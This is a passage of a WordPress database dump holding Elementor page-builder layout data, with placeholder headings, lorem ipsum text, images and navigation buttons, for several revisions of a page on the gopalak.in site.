44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7817,1395,'_elementor_page_assets','a:0:{}'),(7819,1396,'_elementor_edit_mode','builder'),(7820,1396,'_elementor_template_type','wp-page'),(7821,1396,'_elementor_version','3.7.6'),(7822,1396,'_wp_page_template','elementor_canvas'),(7823,1396,'_elementor_data','[{\"id\":\"3051cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49cbdad\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2074e4d\",\"elType\":\"widget\",\"settings\":{\"anchor\":\"home\"},\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7824,1396,'_elementor_page_assets','a:0:{}'),(7826,1397,'_elementor_edit_mode','builder'),(7827,1397,'_elementor_template_type','wp-page'),(7828,1397,'_elementor_version','3.7.6'),(7829,1397,'_wp_page_template','elementor_canvas'),(7830,1397,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":34.872},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.023},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.042999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.044},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, 